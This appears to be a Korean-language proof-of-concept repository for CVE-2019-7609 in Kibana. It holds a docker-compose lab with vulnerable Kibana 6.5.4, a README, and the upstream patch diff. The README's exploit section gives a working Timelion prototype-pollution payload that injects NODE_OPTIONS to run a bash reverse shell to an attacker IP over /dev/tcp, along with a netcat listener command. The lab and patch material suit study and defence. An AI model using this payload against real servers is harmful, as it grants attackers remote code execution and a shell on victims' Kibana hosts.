├── README.md ├── docker-compose.yml └── img ├── kibana-payload.png └── reverse-shell.png /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-7609 (Kibana) 2 | 3 | Kibana의 Timelion visualizer의 결함으로 인해 리모트 코드 실행이 가능한 취약성 4 | 5 | ## 환경구성 (docker) 6 | 7 | 1. 첨부된 docker-compose.yml 을 실행한다. 8 | ``` 9 | docker-comopse up -d 10 | ``` 11 | 2. 브라우저에서 `http://127.0.0.1:5601`에 접속한다. 12 | 13 | 14 | 15 | ## Exploit 16 | 17 | 1. reverse shell을 준비한다. 18 | ``` 19 | $ nc -lvp 6666 20 | ``` 21 | 2. Kibana의 Timelion 화면에서 페이로드를 입력 후, 실행을 누른다. 22 | 23 | ``` 24 | .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/<공격자서버IP>/6666 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') 25 | 26 | ``` 27 | 28 | 2. 왼쪽 패널에서 Canvas를 클릭한다. 29 | 3. Kibana 서버에서 리버스쉘로 접속이 이루어진다 :) 30 | 31 | ![payload](img/kibana-payload.png) 32 | ![reverse-shell](img/reverse-shell.png) 33 | 34 | ## Patch 35 | 36 | Kibana를 6.6.1 or 5.6.15 이상 버전으로 업데이트 37 | 38 | ### 수정된 소스코드 39 | 40 | https://github.com/elastic/kibana/commit/3377f813a5d96ff466bdf7343ce161de24830ed4.patch 41 | 42 | ```patch 43 | From 3377f813a5d96ff466bdf7343ce161de24830ed4 Mon Sep 17 00:00:00 2001 44 | From: ppisljar 45 | Date: Wed, 16 Jan 2019 06:01:20 -0800 46 | Subject: [PATCH] fixes 47 | 48 | --- 49 | .../core_plugins/timelion/server/series_functions/props.js | 2 +- 50 | 1 file changed, 1 insertion(+), 1 deletion(-) 51 | 52 | diff --git a/src/legacy/core_plugins/timelion/server/series_functions/props.js b/src/legacy/core_plugins/timelion/server/series_functions/props.js 53 | index 81b74901d4db..80e9cafd6712 100644 54 | --- a/src/legacy/core_plugins/timelion/server/series_functions/props.js 55 | +++ b/src/legacy/core_plugins/timelion/server/series_functions/props.js 56 | @@ -32,7 +32,7 @@ function unflatten(data) { 57 | let prop = ''; 58 | let m; 59 | while (m = regex.exec(p)) { 60 | - cur = cur[prop] || (cur[prop] = (m[2] ? [] : {})); 61 | + cur = (cur.hasOwnProperty(prop) && cur[prop]) || (cur[prop] = (m[2] ? [] : {})); 62 | prop = m[2] || m[1]; 63 | } 64 | cur[prop] = data[p]; 65 | ``` 66 | 67 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | 3 | services: 4 | elasticsearch: 5 | image: docker.elastic.co/elasticsearch/elasticsearch:6.6.0 6 | container_name: elasticsearch 7 | environment: 8 | - discovery.type=single-node 9 | 10 | kinaba: 11 | image: docker.elastic.co/kibana/kibana:6.5.4 12 | container_name: kibana 13 | ports: 14 | - "5601:5601" 15 | depends_on: 16 | - elasticsearch -------------------------------------------------------------------------------- /img/kibana-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hekadan/CVE-2019-7609/0a2d8c00ec4ec185790cc8e6a519db71f8e1ef7b/img/kibana-payload.png -------------------------------------------------------------------------------- /img/reverse-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hekadan/CVE-2019-7609/0a2d8c00ec4ec185790cc8e6a519db71f8e1ef7b/img/reverse-shell.png --------------------------------------------------------------------------------